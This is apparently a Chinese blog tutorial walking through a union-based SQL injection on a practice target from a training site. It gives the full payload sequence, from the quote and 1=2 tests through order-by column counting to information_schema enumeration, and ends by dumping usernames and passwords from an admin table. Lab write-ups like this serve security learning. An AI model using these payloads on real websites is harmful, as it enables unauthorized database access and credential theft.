sql注入之union注入

news/2024/12/23 22:33:30 标签: sql, 数据库

Sql注入之union注入攻击

今天讲讲sql注入攻击流程

事先声明,本文仅仅作为学习使用,因个人原因导致的后果,皆与本人无关,后果由个人承担。

本次演示靶机为封神台里的题目,具体连接如下

https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7

那么话不多说,开始今天的讲解。今天主要讲sql注入中的union注入

对于一个网站,首先对于sql注入先验证是字符型注入还是数字型注入,

从以上两张图看出,我们将id=1改为id=1‘,页面出错,可以判断这个是数字型注入。对于字符型和数字型可以用这个方法判断

接下来使用id=1 and 1=1测试

以及使用id=1 and 1=2测试

这里发现1=1输出正常,而是用1=2页面报错,初步判断存漏洞

接下来使用order by

id=1 and 1=1 order by 1

id=1 and 1=1 order by 2

id=1 and 1=1 order by 3

可以看到order by 3 时网页出错,初步判断存在2个传参点

结合上面1=2存在漏洞,开始找漏洞

接下来使用union参数(从这里开始才是真正的union注入)

Id=1 and 1=2 union select1,2

网页输出2,所以我们对2处更改查找数据库

id=1 and 1=2 union select 1,database()

此处括号容易漏掉,本人操作时也经常漏掉,希望大家在以后的测试中不要忘记

接下来构造?id=1 and 1=2 union select 1, table_name from information_schema.tables where table_schema=database() limit 0,1

网页显示admin

接下来构造?id=1 and 1=2 union select 1, column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1

这两句是union注入中较为重要的句子,大家在练习的时候建议敲一遍而不是复制粘贴,两句其实还挺像的,我把两句中的不同的地方标出来,方便大家记忆

将上述句子limit 0,1 更改为limit 1,1

再更改为limit 2,1

可知admin分为id,username,password

如果不确定的话可以改为limit 3,1试一下

接下来就是数据库信息了

使用如下句子:

?id=1 and 1=2 union select 1,username from admin  limit 0,1

将limit0,1改为1,1

查找密码

?id=1 and 1=2 union select 1,password from admin  limit 0,1

Limit0,1更改为1,1

到这里我们的sql注入的union注入就结束了,大家可以到官网上去看一下,也有解题思路,我这篇文章就是借鉴他的解题思路和过程。

最后声明,任何因个人原因导致的后果,皆有个人承担。


http://www.niftyadmin.cn/n/5797077.html

相关文章

<代码随想录> 算法训练营-2024.12.20

322. 零钱兑换 class Solution:def coinChange(self, coins: List[int], amount: int) -> int:# dp[i][j]表示 提供到coins[i]的硬币,总金额为j的最少硬币个数 硬币个数无限,完全背包# 有两种取值,一种是取dp[i-1][j] 另一种是如果j比当前…

HarmonyOS NEXT 技术实践-基于基础视觉服务实现骨骼点识别

本示例展示了如何在HarmonyOS Next中实现基于基础视觉服务的骨骼点识别功能。骨骼点识别是计算机视觉中的一项重要技术,广泛应用于运动分析、健身监控和增强现实等领域。通过使用HarmonyOS Next提供的视觉API,开发者能够轻松地对人物图像进行骨骼点检测&…

反无人机防御系统概述!

一、定义与工作原理 反无人机防御系统是指利用频谱侦测探测、雷达探测、无线电干扰压制等技术实现对非法入侵无人机进行管控防御的系统。它采用多种技术手段,如雷达、光电传感器、红外线探测器等,通过实时监测无人机的位置、速度、航迹、姿态等信息&…

5G -- 发展与演进

概述: 5G将通过支持增强移动宽带(eMBB)、低时延高可靠连接(uRLLC)和海量机器连接(mMTC)三大场景,以满足网络能力极端化、网络能力差异化以及网络融合的多样化的业务需求&#xff0c…

【更新】Docker新手入门教程2:在Windows系统通过compose创建多个mysql镜像并配置应用

文章目录 前言一、运行Docker init生成docker配置文件二、修改创建镜像的配置文件1、添加镜像挂载点 三、【拉取镜像】四、生成Docker 镜像查看生成的镜像 五、修改Compose配置文件3、配置Mysql六、生成Docker容器七、检查容器创建状态总结 前言 在window下通过Docker创建mysq…

使用Electron获取用户信息,监听程序打开,用户退出连接关闭程序【全代码,有图】

使用Electron获取用户信息,监听程序打开,用户退出连接关闭程序【全代码,有图】 效果图 如有其他操作可在代码中自己添加 main.js const { app, BrowserWindow, ipcMain } require(electron); const path require(node:path); const os…

【计算机视觉基础CV-图像分类】03-深度学习图像分类实战:鲜花数据集加载与预处理详解

本文将深入介绍鲜花分类数据集的加载与处理方式,同时详细解释代码的每一步骤并给出更丰富的实践建议和拓展思路。以实用为导向,为读者提供从数据组织、预处理、加载到可视化展示的完整过程,并为后续模型训练打下基础。 前言 在计算机视觉的深…

基于单片机的步进电机控制系统的设计研究

摘要 :随着我国社会经济结构的不断优化与升级,加工制造工业得到了长足发展 。 加工制造工业体系的日益成熟,使得步进电机应用的范围越来越广泛,逐渐成为工业生产与社会生活中必不可少的工业组成。 因此如何提升步进电机的性能、 实现步进电机控制系统的科学设计,就成为现阶…